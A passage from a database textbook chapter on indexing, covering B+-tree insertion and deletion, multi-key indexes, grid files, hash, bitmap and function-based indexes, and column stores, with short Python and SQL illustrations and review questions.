pointers are at the leaf level. However, only some values exist in internal nodes to
guide the search. Notice also that every value appearing in an internal node also
appears as the rightmost value in the leaf level of the subtree pointed at by the tree
pointer to the left of the value.

When a leaf node is full and a new entry is inserted there, the node overflows and
must be split. The first j = ⎡((pleaf + 1)/2)⎤ entries in the original node are kept
there, and the remaining entries are moved to a new leaf node. The jth search value
is replicated in the parent internal node, and an extra pointer to the new node is cre-
ated in the parent. These must be inserted in the parent node in their correct
sequence. If the parent internal node is full, the new value will cause it to overflow
also, so it must be split. The entries in the internal node up to Pj—the jth tree
pointer after inserting the new value and pointer, where j = ⎣((p + 1)/2)⎦—are kept,
while the jth search value is moved to the parent, not replicated. A new internal
node will hold the entries from Pj+1 to the end of the entries in the node (see
Algorithm 3). This splitting can propagate all the way up to create a new root node
and hence a new level for the B+-tree.

Figure 13 illustrates deletion from a B+-tree. When an entry is deleted, it is always
removed from the leaf level. If it happens to occur in an internal node, it must also
be removed from there. In the latter case, the value to its left in the leaf node must
replace it in the internal node because that value is now the rightmost entry in the
subtree. Deletion may cause underflow by reducing the number of entries in the
leaf node to below the minimum required. In this case, we try to find a sibling leaf
node—a leaf node directly to the left or to the right of the node with underflow—

[Figure 12: An example of insertion in a B+-tree with p = 3 and pleaf = 2. Insertion sequence: 8, 5, 1, 7, 3, 12, 9, 6. The panels show the tree after each step: insert 8, 5; insert 1 (overflow, new level); insert 7; insert 3 (overflow, split); insert 12 (overflow, split, propagates, new level); insert 9; insert 6 (overflow, split, propagates).]

[Figure 13: An example of deletion from a B+-tree. Deletion sequence: 5, 12, 9. The panels show the tree after each step: delete 5; delete 12 (underflow, redistribute); delete 9 (underflow, merge with left, redistribute).]

and redistribute the entries among the node and its sibling so that both are at least
half full; otherwise, the node is merged with its siblings and the number of leaf
nodes is reduced. A common method is to try to redistribute entries with the left
sibling; if this is not possible, an attempt to redistribute with the right sibling is


made. If this is also not possible, the three nodes are merged into two leaf nodes. In
such a case, underflow may propagate to internal nodes because one fewer tree
pointer and search value are needed. This can propagate and reduce the tree levels.

Notice that implementing the insertion and deletion algorithms may require parent
and sibling pointers for each node, or the use of a stack as in Algorithm 3. Each node
should also include the number of entries in it and its type (leaf or internal).
Another alternative is to implement insertion and deletion as recursive
procedures.11

Variations of B-Trees and B+-Trees. To conclude this section, we briefly men-
tion some variations of B-trees and B+-trees. In some cases, constraint 5 on the B-
tree (or for the internal nodes of the B+–tree, except the root node), which requires
each node to be at least half full, can be changed to require each node to be at least
two-thirds full. In this case the B-tree has been called a B*-tree. In general, some
systems allow the user to choose a fill factor between 0.5 and 1.0, where the latter
means that the B-tree (index) nodes are to be completely full. It is also possible to
specify two fill factors for a B+-tree: one for the leaf level and one for the internal
nodes of the tree. When the index is first constructed, each node is filled up to
approximately the fill factors specified. Some investigators have suggested relaxing
the requirement that a node be half full, and instead allow a node to become com-
pletely empty before merging, to simplify the deletion algorithm. Simulation studies
show that this does not waste too much additional space under randomly distrib-
uted insertions and deletions.

4 Indexes on Multiple Keys
In our discussion so far, we have assumed that the primary or secondary keys on
which files were accessed were single attributes (fields). In many retrieval and
update requests, multiple attributes are involved. If a certain combination of attrib-
utes is used frequently, it is advantageous to set up an access structure to provide
efficient access by a key value that is a combination of those attributes.

For example, consider an EMPLOYEE file containing attributes Dno (department
number), Age, Street, City, Zip_code, Salary and Skill_code, with the key of Ssn (Social
Security number). Consider the query: List the employees in department number 4
whose age is 59. Note that both Dno and Age are nonkey attributes, which means that
a search value for either of these will point to multiple records. The following alter-
native search strategies may be considered:

1. Assuming Dno has an index, but Age does not, access the records having
Dno = 4 using the index, and then select from among them those records that
satisfy Age = 59.

11For more details on insertion and deletion algorithms for B+ trees, consult Ramakrishnan and Gehrke
[2003].


2. Alternately, if Age is indexed but Dno is not, access the records having Age =
59 using the index, and then select from among them those records that sat-
isfy Dno = 4.

3. If indexes have been created on both Dno and Age, both indexes may be used;
each gives a set of records or a set of pointers (to blocks or records). An inter-
section of these sets of records or pointers yields those records or pointers
that satisfy both conditions.

All of these alternatives eventually give the correct result. However, if the set of
records that meet each condition (Dno = 4 or Age = 59) individually is large, yet
only a few records satisfy the combined condition, then none of the above is an effi-
cient technique for the given search request. A number of possibilities exist that
would treat the combination < Dno, Age> or < Age, Dno> as a search key made up of
multiple attributes. We briefly outline these techniques in the following sections. We
will refer to keys containing multiple attributes as composite keys.

4.1 Ordered Index on Multiple Attributes
All the discussion in this chapter so far still applies if we create an index on a search
key field that is a combination of <Dno, Age>. The search key is a pair of values <4, 59> in the above example. In general, if an index is created on attributes <A1, A2, ..., An>, the search key values are tuples with n values: <v1, v2, ..., vn>.

A lexicographic ordering of these tuple values establishes an order on this compos-
ite search key. For our example, all of the department keys for department number
3 precede those for department number 4. Thus <3, n> precedes <4, m> for any val-
ues of m and n. The ascending key order for keys with Dno = 4 would be <4, 18>, <4, 19>, <4, 20>, and so on. Lexicographic ordering works similarly to ordering of
character strings. An index on a composite key of n attributes works similarly to any
index discussed in this chapter so far.
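
Lexicographic ordering of composite keys corresponds exactly to the ordering of tuples in most programming languages. The small Python illustration below (ours, using the running <Dno, Age> example) shows this directly.

# Composite search keys <Dno, Age> compared lexicographically,
# exactly as an ordered composite index would arrange them.
entries = [(4, 59), (3, 61), (4, 18), (3, 25), (4, 20)]
print(sorted(entries))
# [(3, 25), (3, 61), (4, 18), (4, 20), (4, 59)]
# All <3, n> keys precede all <4, m> keys, and within Dno = 4
# the entries are ordered by Age: <4, 18>, <4, 20>, <4, 59>.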

4.2 Partitioned Hashing
Partitioned hashing is an extension of static external hashing that allows access on
multiple keys. It is suitable only for equality comparisons; range queries are not sup-
ported. In partitioned hashing, for a key consisting of n components, the hash func-
tion is designed to produce a result with n separate hash addresses. The bucket
address is a concatenation of these n addresses. It is then possible to search for the
required composite search key by looking up the appropriate buckets that match the
parts of the address in which we are interested.

For example, consider the composite search key <Dno, Age>. If Dno and Age are
hashed into a 3-bit and 5-bit address respectively, we get an 8-bit bucket address.
Suppose that Dno = 4 has a hash address ‘100’ and Age = 59 has hash address ‘10101’.
Then to search for the combined search value, Dno = 4 and Age = 59, one goes to
bucket address 100 10101; just to search for all employees with Age = 59, all buckets
(eight of them) will be searched whose addresses are ‘000 10101’, ‘001 10101’, … and

[Figure 14: Example of a grid array on Dno and Age attributes. One linear scale maps Dno values to grid positions 0–5 (1, 2 → 0; 3, 4 → 1; 5 → 2; 6, 7 → 3; 8 → 4; 9, 10 → 5), and another maps the Age ranges <20, 21–25, 26–30, 31–40, 41–50, >50 to positions 0–5; each grid cell points to a bucket in the bucket pool of the EMPLOYEE file.]

so on. An advantage of partitioned hashing is that it can be easily extended to any
number of attributes. The bucket addresses can be designed so that high-order bits
in the addresses correspond to more frequently accessed attributes. Additionally, no
separate access structure needs to be maintained for the individual attributes. The
main drawback of partitioned hashing is that it cannot handle range queries on any
of the component attributes.
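
A minimal Python sketch of this addressing scheme follows. The two component hash functions h_dno and h_age are hypothetical stand-ins that produce 3-bit and 5-bit values, so the concrete addresses differ from the '100 10101' example above, but the concatenation and the eight-bucket search pattern are the same.

# Minimal sketch of partitioned hashing on the composite key <Dno, Age>.
# h_dno and h_age are illustrative hash functions producing 3 and 5 bits.
def h_dno(dno):
    return dno % 8                      # 3-bit component address

def h_age(age):
    return age % 32                     # 5-bit component address

def bucket_address(dno, age):
    return f"{h_dno(dno):03b}{h_age(age):05b}"   # concatenate the two parts

print(bucket_address(4, 59))            # one specific 8-bit bucket address

# An equality query on Age alone must look at all 8 buckets that share
# the same 5-bit Age component but differ in the 3-bit Dno component:
age_part = f"{h_age(59):05b}"
print([f"{d:03b}{age_part}" for d in range(8)])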

4.3 Grid Files
Another alternative is to organize the EMPLOYEE file as a grid file. If we want to
access a file on two keys, say Dno and Age as in our example, we can construct a grid
array with one linear scale (or dimension) for each of the search attributes. Figure
14 shows a grid array for the EMPLOYEE file with one linear scale for Dno and
another for the Age attribute. The scales are chosen so as to achieve a uniform
distribution of that attribute. Thus, in our example, we show that the linear scale for
Dno has Dno = 1, 2 combined as one value 0 on the scale, while Dno = 5 corresponds
to the value 2 on that scale. Similarly, Age is divided into its scale of 0 to 5 by group-
ing ages so as to distribute the employees uniformly by age. The grid array shown
for this file has a total of 36 cells. Each cell points to some bucket address where the
records corresponding to that cell are stored. Figure 14 also shows the assignment of
cells to buckets (only partially).

Thus our request for Dno = 4 and Age = 59 maps into the cell (1, 5) corresponding
to the grid array. The records for this combination will be found in the correspond-
ing bucket. This method is particularly useful for range queries that would map into
a set of cells corresponding to a group of values along the linear scales. If a range
query corresponds to a match on some of the grid cells, it can be processed by
accessing exactly the buckets for those grid cells. For example, a query for Dno ≤ 5


and Age > 40 refers to the data in the top bucket shown in Figure 14. The grid file
concept can be applied to any number of search keys. For example, for n search keys,
the grid array would have n dimensions. The grid array thus allows a partitioning of
the file along the dimensions of the search key attributes and provides an access by
combinations of values along those dimensions. Grid files perform well in terms of
reduction in time for multiple key access. However, they represent a space overhead
in terms of the grid array structure. Moreover, with dynamic files, a frequent reor-
ganization of the file adds to the maintenance cost.12
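
The mapping from attribute values to grid cells through the linear scales can be sketched in a few lines of Python; the scale boundaries below are assumed for illustration, following the partially shown scales of Figure 14.

import bisect

# Linear scales assumed for illustration, following Figure 14:
# Dno values are grouped into 6 scale positions, and Age is bucketed
# as <=20, 21-25, 26-30, 31-40, 41-50, >50.
dno_scale = {1: 0, 2: 0, 3: 1, 4: 1, 5: 2, 6: 3, 7: 3, 8: 4, 9: 5, 10: 5}
age_breaks = [20, 25, 30, 40, 50]

def grid_cell(dno, age):
    """Map a (Dno, Age) pair to its cell in the 6 x 6 grid array."""
    return (dno_scale[dno], bisect.bisect_left(age_breaks, age))

print(grid_cell(4, 59))   # -> (1, 5): the cell for Dno = 4, Age = 59, as in the text

# A range query such as Dno <= 5 AND Age > 40 touches only the cells
# whose scale positions satisfy both ranges:
cells = {(r, c) for d, r in dno_scale.items() if d <= 5 for c in (4, 5)}
print(sorted(cells))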

5 Other Types of Indexes

5.1 Hash Indexes
It is also possible to create access structures similar to indexes that are based on
hashing. The hash index is a secondary structure to access the file by using hashing
on a search key other than the one used for the primary data file organization. The
index entries are of the type or , where Pr is a pointer to the record
containing the key, or P is a pointer to the block containing the record for that key.
The index file with these index entries can be organized as a dynamically expand-
able hash file; searching for an entry uses the hash search algorithm on K. Once an
entry is found, the pointer Pr (or P) is used to locate the corresponding record in the
data file. Figure 15 illustrates a hash index on the Emp_id field for a file that has been
stored as a sequential file ordered by Name. The Emp_id is hashed to a bucket num-
ber by using a hashing function: the sum of the digits of Emp_id modulo 10. For
example, to find Emp_id 51024, the hash function results in bucket number 2; that
bucket is accessed first. It contains the index entry < 51024, Pr >; the pointer Pr
leads us to the actual record in the file. In a practical application, there may be thou-
sands of buckets; the bucket number, which may be several bits long, would be sub-
jected to the directory schemes related to dynamic hashing. Other search structures
can also be used as indexes.
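
A minimal Python sketch of this hash index follows; the data file is a small in-memory list ordered by last name, and a "record pointer" is simply a position in that list (an assumption made only for the illustration).

# Minimal sketch of the hash index of Figure 15: buckets of <Emp_id, Pr>
# entries, where the hash function is the digit sum of Emp_id modulo 10.
def bucket_number(emp_id):
    return sum(int(d) for d in str(emp_id)) % 10

# The data file, ordered by Name; a "record pointer" here is simply the
# record's position in this list (a stand-in for a block address + offset).
data_file = [(51024, "Bass"), (23402, "Clarke"), (62104, "England"),
             (34723, "Ferragamo"), (81165, "Gucci"), (13646, "Hanson"),
             (12676, "Marcus"), (41301, "Zara")]

buckets = {}
for pr, (emp_id, _) in enumerate(data_file):
    buckets.setdefault(bucket_number(emp_id), []).append((emp_id, pr))

def lookup(emp_id):
    for key, pr in buckets.get(bucket_number(emp_id), []):
        if key == emp_id:
            return data_file[pr]        # follow the pointer into the data file
    return None

print(bucket_number(51024))             # -> 2, as in the text's example
print(lookup(51024))                    # -> (51024, 'Bass')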

5.2 Bitmap Indexes
The bitmap index is another popular data structure that facilitates querying on
multiple keys. Bitmap indexing is used for relations that contain a large number of
rows. It creates an index for one or more columns, and each value or value range in
those columns is indexed. Typically, a bitmap index is created for those columns
that contain a fairly small number of unique values. To build a bitmap index on a set
of records in a relation, the records must be numbered from 0 to n with an id (a
record id or a row id) that can be mapped to a physical address made of a block
number and a record offset within the block.

12Insertion/deletion algorithms for grid files may be found in Nievergelt et al. (1984).

[Figure 15: Hash-based indexing. Buckets 0 through 9 hold <Emp_id, record pointer> entries (for example, bucket 2 holds the entries for Emp_ids 51024 and 12676), and each pointer leads to the corresponding record in the data file, which is stored as a sequential file ordered by last name.]

A bitmap index is built on one particular value of a particular field (the column in a
relation) and is just an array of bits. Consider a bitmap index for the column C and
a value V for that column. For a relation with n rows, it contains n bits. The ith bit is
set to 1 if the row i has the value V for column C; otherwise it is set to a 0. If C con-
tains the value set <V1, V2, ..., Vm> with m distinct values, then m bitmap indexes
would be created for that column. Figure 16 shows the relation EMPLOYEE with
columns Emp_id, Lname, Sex, Zipcode, and Salary_grade (with just 8 rows for illustra-
tion) and a bitmap index for the Sex and Zipcode columns. For example, in the
bitmap for Sex = F, the bits for Row_ids 1, 3, 4, and 7 are set to 1, and the rest of the
bits are set to 0. The bitmap indexes can be used in the following query applications:

■ For the query C1 = V1 , the corresponding bitmap for value V1 returns the
Row_ids containing the rows that qualify.


EMPLOYEE

Row_id Emp_id Lname Sex Zipcode Salary_grade
0 51024 Bass M 94040 ..
1 23402 Clarke F 30022 ..
2 62104 England M 19046 ..
3 34723 Ferragamo F 30022 ..
4 81165 Gucci F 19046 ..
5 13646 Hanson M 19046 ..
6 12676 Marcus M 30022 ..
7 41301 Zara F 94040 ..

Bitmap index for Sex

M F
10100110 01011001

Bitmap index for Zipcode

Zipcode 19046 Zipcode 30022 Zipcode 94040
00101100 01010010 10000001

Figure 16: Bitmap indexes for Sex and Zipcode.

■ For the query C1= V1 and C2 = V2 (a multikey search request), the two cor-
responding bitmaps are retrieved and intersected (logically AND-ed) to
yield the set of Row_ids that qualify. In general, k bitvectors can be intersected
to deal with k equality conditions. Complex AND-OR conditions can also be
supported using bitmap indexing.

■ To retrieve a count of rows that qualify for the condition C1 = V1, the “1”
entries in the corresponding bitvector are counted.

■ Queries with negation, such as C1 ¬ = V1, can be handled by applying the
Boolean complement operation on the corresponding bitmap.

Consider the example in Figure 16. To find employees with Sex = F and
Zipcode = 30022, we intersect the bitmaps “01011001” and “01010010” yielding
Row_ids 1 and 3. Employees who do not live in Zipcode = 94040 are obtained by
complementing the bitvector “10000001”, which yields Row_ids 1 through 6. In gen-
eral, if we assume uniform distribution of values for a given column, and if one col-
umn has 5 distinct values and another has 10 distinct values, the join condition on
these two can be considered to have a selectivity of 1/50 (=1/5 * 1/10). Hence, only
about 2 percent of the records would actually have to be retrieved. If a column has
only a few values, like the Sex column in Figure 16, retrieval of the Sex = M condi-
tion on average would retrieve 50 percent of the rows; in such cases, it is better to do
a complete scan rather than use bitmap indexing.
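
The following Python sketch builds the two bitmaps of Figure 16 and evaluates the AND and complement queries just described; representing each bitmap as a list of bits, with position i standing for Row_id i, is an implementation choice assumed here.

# Minimal sketch of bitmap indexing over the eight rows of Figure 16.
# Each bitmap is a list of bits; position i corresponds to Row_id i.
rows = [  # (Row_id implied by position): (Sex, Zipcode)
    ("M", 94040), ("F", 30022), ("M", 19046), ("F", 30022),
    ("F", 19046), ("M", 19046), ("M", 30022), ("F", 94040),
]

def bitmap(column_index, value):
    return [1 if row[column_index] == value else 0 for row in rows]

sex_f  = bitmap(0, "F")        # [0,1,0,1,1,0,0,1]  -> "01011001"
zip_30 = bitmap(1, 30022)      # [0,1,0,1,0,0,1,0]  -> "01010010"

# Multikey query Sex = 'F' AND Zipcode = 30022: AND the two bitmaps.
both = [a & b for a, b in zip(sex_f, zip_30)]
print([i for i, bit in enumerate(both) if bit])        # -> [1, 3]

# Negation, e.g. Zipcode <> 94040: complement the Zipcode = 94040 bitmap.
zip_94 = bitmap(1, 94040)
print([i for i, bit in enumerate(zip_94) if not bit])  # -> [1, 2, 3, 4, 5, 6]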

In general, bitmap indexes are efficient in terms of the storage space that they need.
If we consider a file of 1 million rows (records) with record size of 100 bytes per row,
each bitmap index would take up only one bit per row and hence would use 1 mil-
lion bits or 125 Kbytes. Suppose this relation is for 1 million residents of a state, and
they are spread over 200 ZIP Codes; the 200 bitmaps over Zipcodes contribute 200
bits (or 25 bytes) worth of space per row; hence, the 200 bitmaps occupy only 25
percent as much space as the data file. They allow an exact retrieval of all residents
who live in a given ZIP Code by yielding their Row_ids.


When records are deleted, renumbering rows and shifting bits in bitmaps becomes
expensive. Another bitmap, called the existence bitmap, can be used to avoid this
expense. This bitmap has a 0 bit for the rows that have been deleted but are still
present and a 1 bit for rows that actually exist. Whenever a row is inserted in the
relation, an entry must be made in all the bitmaps of all the columns that have a
bitmap index; rows typically are appended to the relation or may replace deleted
rows. This process represents an indexing overhead.

Large bitvectors are handled by treating them as a series of 32-bit or 64-bit vectors,
and corresponding AND, OR, and NOT operators are used from the instruction set
to deal with 32- or 64-bit input vectors in a single instruction. This makes bitvector
operations computationally very efficient.

Bitmaps for B+-Tree Leaf Nodes. Bitmaps can also be used in the leaf nodes of
B+-tree indexes to point to the set of records that contain each specific
value of the indexed field in the leaf node. When the B+-tree is built on a nonkey
search field, the leaf record must contain a list of record pointers alongside each
value of the indexed attribute. For values that occur very frequently, that is, in a
large percentage of the relation, a bitmap index may be stored instead of the point-
ers. As an example, for a relation with n rows, suppose a value occurs in 10 percent
of the file records. A bitvector would have n bits, having the “1” bit for those Row_ids
that contain that search value, which is n/8 or 0.125n bytes in size. If the record
pointer takes up 4 bytes (32 bits), then the n/10 record pointers would take up
4 * n/10 or 0.4n bytes. Since 0.4n is more than 3 times larger than 0.125n, it is better
to store the bitmap index rather than the record pointers. Hence for search values
that occur more frequently than a certain ratio (in this case that would be 1/32), it is
beneficial to use bitmaps as a compressed storage mechanism for representing the
record pointers in B+-trees that index a nonkey field.
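
The space comparison generalizes to a simple break-even rule, sketched below with plain arithmetic in Python (the 4-byte record pointer is the size assumed in the text).

# Space (in bytes) needed to represent the set of records holding one value,
# for a file of n rows; assumes 4-byte record pointers as in the text.
def bitmap_bytes(n):
    return n // 8                         # one bit per row

def pointer_list_bytes(n_qualifying, ptr_size=4):
    return ptr_size * n_qualifying        # one pointer per qualifying record

n = 1_000_000
print(bitmap_bytes(n), pointer_list_bytes(n // 10))   # 125000 vs 400000 bytes
# The bitmap is smaller whenever the value's frequency f satisfies
# ptr_size * f > 1/8, i.e. f > 1/(8 * ptr_size) = 1/32 for 4-byte pointers,
# which is the break-even ratio mentioned in the text.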

5.3 Function-Based Indexing
In this section we discuss a new type of indexing, called function-based indexing,
that has been introduced in the Oracle relational DBMS as well as in some other
commercial products.13

The idea behind function-based indexing is to create an index such that the value
that results from applying some function on a field or a collection of fields becomes
the key to the index. The following examples show how to create and use function-
based indexes.

Example 1. The following statement creates a function-based index on the
EMPLOYEE table based on an uppercase representation of the Lname column, which
can be entered in many ways but is always queried by its uppercase representation.

CREATE INDEX upper_ix ON Employee (UPPER(Lname));

13Rafi Ahmed contributed most of this section.


This statement will create an index based on the function UPPER(Lname), which
returns the last name in uppercase letters; for example, UPPER(‘Smith’) will
return ‘SMITH’.

Function-based indexes ensure that the Oracle Database system will use the index
rather than perform a full table scan, even when a function is used in the search
predicate of a query. For example, the following query will use the index:

SELECT First_name, Lname
FROM Employee
WHERE UPPER(Lname) = 'SMITH';

Without the function-based index, an Oracle Database might perform a full table
scan, since a B+-tree index is searched only by using the column value directly; the
use of any function on a column prevents such an index from being used.

Example 2. In this example, the EMPLOYEE table is supposed to contain two
fields—salary and commission_pct (commission percentage)—and an index is being
created on the sum of salary and commission based on the commission_pct.

CREATE INDEX income_ix
ON Employee(Salary + (Salary*Commission_pct));

The following query uses the income_ix index even though the fields salary and
commission_pct are occurring in the reverse order in the query when compared to
the index definition.

SELECT First_name, Lname
FROM Employee
WHERE ((Salary*Commission_pct) + Salary ) > 15000;

Example 3. This is a more advanced example of using function-based indexing to
define conditional uniqueness. The following statement creates a unique function-
based index on the ORDERS table that prevents a customer from taking advantage of
a promotion id (“blowout sale”) more than once. It creates a composite index on the
Customer_id and Promotion_id fields together, and it allows only one entry in the index
for a given Customer_id with the Promotion_id of “2” by declaring it as a unique index.

CREATE UNIQUE INDEX promo_ix ON Orders
(CASE WHEN Promotion_id = 2 THEN Customer_id ELSE NULL END,
CASE WHEN Promotion_id = 2 THEN Promotion_id ELSE NULL END);

Note that by using the CASE statement, the objective is to remove from the index any
rows where Promotion_id is not equal to 2. Oracle Database does not store in the B+-
tree index any rows where all the keys are NULL. Therefore, in this example, we map
both Customer_id and Promotion_id to NULL unless Promotion_id is equal to 2. The
result is that the index constraint is violated only if Promotion_id is equal to 2, for two
(attempted insertions of) rows with the same Customer_id value.


6 Some General Issues Concerning Indexing

6.1 Logical versus Physical Indexes
In the earlier discussion, we have assumed that the index entries <K, Pr> (or <K, P>) always include a physical pointer Pr (or P) that specifies the physical record
address on disk as a block number and offset. This is sometimes called a physical
index, and it has the disadvantage that the pointer must be changed if the record is
moved to another disk location. For example, suppose that a primary file organiza-
tion is based on linear hashing or extendible hashing; then, each time a bucket is
split, some records are allocated to new buckets and hence have new physical
addresses. If there was a secondary index on the file, the pointers to those records
would have to be found and updated, which is a difficult task.

To remedy this situation, we can use a structure called a logical index, whose index
entries are of the form <K, Kp>. Each entry has one value K for the secondary index-
ing field matched with the value Kp of the field used for the primary file organiza-
tion. By searching the secondary index on the value of K, a program can locate the
corresponding value of Kp and use this to access the record through the primary file
organization. Logical indexes thus introduce an additional level of indirection
between the access structure and the data. They are used when physical record
addresses are expected to change frequently. The cost of this indirection is the extra
search based on the primary file organization.
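
A logical index can be pictured as a two-step lookup, sketched below in Python. In this hypothetical sketch the secondary key is Name and the primary organization is keyed on Ssn; the dictionaries, field values, and Ssn numbers are invented for the illustration.

# Minimal sketch of a logical index <K, Kp>: step 1 finds Kp from the
# secondary key K; step 2 locates the record through the primary file
# organization (here a dictionary standing in for a hash-based primary
# organization on Ssn).
primary_file = {  # primary organization keyed on Ssn (Kp); values invented
    "123-44-5555": {"Ssn": "123-44-5555", "Name": "Aaron, Ed"},
    "678-90-1234": {"Ssn": "678-90-1234", "Name": "Abbott, Diane"},
}
logical_index = {  # secondary key Name (K) -> primary key Ssn (Kp)
    "Aaron, Ed": "123-44-5555",
    "Abbott, Diane": "678-90-1234",
}

def lookup_by_name(name):
    kp = logical_index.get(name)                   # step 1: K -> Kp
    return primary_file.get(kp) if kp else None    # step 2: Kp -> record

print(lookup_by_name("Abbott, Diane"))
# If the record moves (for example, after a bucket split in the primary
# organization), the logical index entry stays valid because it stores Kp,
# not the physical address.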

6.2 Discussion
In many systems, an index is not an integral part of the data file but can be created
and discarded dynamically. That is why it is often called an access structure.
Whenever we expect to access a file frequently based on some search condition
involving a particular field, we can request the DBMS to create an index on that
field. Usually, a secondary index is created to avoid physical ordering of the records
in the data file on disk.

The main advantage of secondary indexes is that—theoretically, at least—they can
be created in conjunction with virtually any primary record organization. Hence, a
secondary index could be used to complement other primary access methods such
as ordering or hashing, or it could even be used with mixed files. To create a B+-tree
secondary index on some field of a file, we must go through all records in the file to
create the entries at the leaf level of the tree. These entries are then sorted and filled
according to the specified fill factor; simultaneously, the other index levels are cre-
ated. It is more expensive and much harder to create primary indexes and clustering
indexes dynamically, because the records of the data file must be physically sorted
on disk in order of the indexing field. However, some systems allow users to create
these indexes dynamically on their files by sorting the file during index creation.

It is common to use an index to enforce a key constraint on an attribute. While
searching the index to insert a new record, it is straightforward to check at the same


time whether another record in the file—and hence in the index tree—has the same
key attribute value as the new record. If so, the insertion can be rejected.

If an index is created on a nonkey field, duplicates occur; handling of these dupli-
cates is an issue the DBMS product vendors have to deal with and affects data stor-
age as well as index creation and management. Data records for the duplicate key
may be contained in the same block or may span multiple blocks where many dupli-
cates are possible. Some systems add a row id to the record so that records with
duplicate keys have their own unique identifiers. In such cases, the B+-tree index
may regard a <key, Row_id> combination as the de facto key for the index, turning
the index into a unique index with no duplicates. The deletion of a key K from such
an index would involve deleting all occurrences of that key K—hence the deletion
algorithm has to account for this.

In actual DBMS products, deletion from B+-tree indexes is also handled in various
ways to improve performance and response times. Deleted records may be marked
as deleted and the corresponding index entries may also not be removed until a
garbage collection process reclaims the space in the data file; the index is rebuilt
online after garbage collection.

A file that has a secondary index on every one of its fields is often called a fully
inverted file. Because all indexes are secondary, new records are inserted at the end
of the file; therefore, the data file itself is an unordered (heap) file. The indexes are
usually implemented as B+-trees, so they are updated dynamically to reflect inser-
tion or deletion of records. Some commercial DBMSs, such as Software AG’s
Adabas, use this method extensively.

We referred to the popular IBM file organization called ISAM in Section 2. Another
IBM method, the virtual storage access method (VSAM), is somewhat similar to the
B+–tree access structure and is still being used in many commercial systems.

6.3 Column-Based Storage of Relations
There has been a recent trend to consider a column-based storage of relations as an
alternative to the traditional way of storing relations row by row. Commercial rela-
tional DBMSs have offered B+-tree indexing on primary as well as secondary keys as
an efficient mechanism to support access to data by various search criteria and the
ability to write a row or a set of rows to disk at a time to produce write-optimized
systems. For data warehouses, which are read-only databases, the column-based
storage offers particular advantages for read-only queries. Typically, the column-
store RDBMSs consider storing each column of data individually and afford per-
formance advantages in the following areas:

■ Vertically partitioning the table column by column, so that a two-column
table can be constructed for every attribute and thus only the needed
columns can be accessed

■ Use of column-wise indexes (similar to the bitmap indexes discussed in
Section 5.2) and join indexes on multiple tables to answer queries without
having to access the data tables


■ Use of materialized views to support queries on multiple columns

Column-wise storage of data affords additional freedom in the creation of indexes,
such as the bitmap indexes discussed earlier. The same column may be present in
multiple projections of a table and indexes may be created on each projection. To
store the values in the same column, strategies for data compression, null-value sup-
pression, dictionary encoding techniques (where distinct values in the column are
assigned shorter codes), and run-length encoding techniques have been devised.
MonetDB/X100, C-Store, and Vertica are examples of such systems. Further discus-
sion on column-store DBMSs can be found in the references mentioned in this
chapter’s Selected Bibliography.
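
As a toy illustration of two of the compression techniques just mentioned, the following Python sketch dictionary-encodes one column and then run-length-encodes the resulting codes; the column values are invented, and the sketch is not tied to any particular column-store system.

from itertools import groupby

# Toy sketch of dictionary encoding followed by run-length encoding,
# applied to one column of a column store.
column = ["30022", "30022", "30022", "19046", "19046", "94040", "94040", "94040"]

dictionary = {v: code for code, v in enumerate(sorted(set(column)))}
codes = [dictionary[v] for v in column]            # dictionary encoding

rle = [(code, len(list(group))) for code, group in groupby(codes)]
print(dictionary)   # {'19046': 0, '30022': 1, '94040': 2}
print(rle)          # [(1, 3), (0, 2), (2, 3)]  -> (code, run length) pairs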

7 Summary
In this chapter we presented file organizations that involve additional access struc-
tures, called indexes, to improve the efficiency of retrieval of records from a data file.
These access structures may be used in conjunction with primary file organizations,
which are used to organize the file records themselves on disk.

Three types of ordered single-level indexes were introduced: primary, clustering, and
secondary. Each index is specified on a field of the file. Primary and clustering
indexes are constructed on the physical ordering field of a file, whereas secondary
indexes are specified on nonordering fields as additional access structures to improve
performance of queries and transactions. The field for a primary index must also be
a key of the file, whereas it is a nonkey field for a clustering index. A single-level index
is an ordered file and is searched using a binary search. We showed how multilevel
indexes can be constructed to improve the efficiency of searching an index.

Next we showed how multilevel indexes can be implemented as B-trees and B+-
trees, which are dynamic structures that allow an index to expand and shrink
dynamically. The nodes (blocks) of these index structures are kept between half full
and completely full by the insertion and deletion algorithms. Nodes eventually sta-
bilize at an average occupancy of 69 percent full, allowing space for insertions with-
out requiring reorganization of the index for the majority of insertions. B+-trees
can generally hold more entries in their internal nodes than can B-trees, so they may
have fewer levels or hold more entries than does a corresponding B-tree.

We gave an overview of multiple key access methods, and showed how an index can
be constructed based on hash data structures. We discussed the hash index in some
detail—it is a secondary structure to access the file by using hashing on a search key
other than that used for the primary organization. Bitmap indexing is another
important type of indexing used for querying by multiple keys and is particularly
applicable on fields with a small number of unique values. Bitmaps can also be used
at the leaf nodes of B+-tree indexes. We also discussed function-based index-
ing, which is being provided by relational vendors to allow special indexes on a
function of one or more attributes.


We introduced the concept of a logical index and compared it with the physical
indexes we described before. They allow an additional level of indirection in index-
ing in order to permit greater freedom for movement of actual record locations on
disk. We also reviewed some general issues related to indexing, and commented on
column-based storage of relations, which has particular advantages for read-only
databases. Finally, we discussed how combinations of the above organizations can
be used. For example, secondary indexes are often used with mixed files, as well as
with unordered and ordered files.

Review Questions
1. Define the following terms: indexing field, primary key field, clustering field,

secondary key field, block anchor, dense index, and nondense (sparse) index.

2. What are the differences among primary, secondary, and clustering indexes?
How do these differences affect the ways in which these indexes are imple-
mented? Which of the indexes are dense, and which are not?

3. Why can we have at most one primary or clustering index on a file, but sev-
eral secondary indexes?

4. How does multilevel indexing improve the efficiency of searching an index
file?

5. What is the order p of a B-tree? Describe the structure of B-tree nodes.

6. What is the order p of a B+-tree? Describe the structure of both internal and
leaf nodes of a B+-tree.

7. How does a B-tree differ from a B+-tree? Why is a B+-tree usually preferred
as an access structure to a data file?

8. Explain what alternative choices exist for accessing a file based on multiple
search keys.

9. What is partitioned hashing? How does it work? What are its limitations?

10. What is a grid file? What are its advantages and disadvantages?

11. Show an example of constructing a grid array on two attributes on some file.

12. What is a fully inverted file? What is an indexed sequential file?

13. How can hashing be used to construct an index?

14. What is bitmap indexing? Create a relation with two columns and sixteen
tuples and show an example of a bitmap index on one or both.

15. What is the concept of function-based indexing? What additional purpose
does it serve?

16. What is the difference between a logical index and a physical index?

17. What is column-based storage of a relational database?


Exercises
18. Consider a disk with block size B = 512 bytes. A block pointer is P = 6 bytes

long, and a record pointer is PR = 7 bytes long. A file has r = 30,000
EMPLOYEE records of fixed length. Each record has the following fields: Name
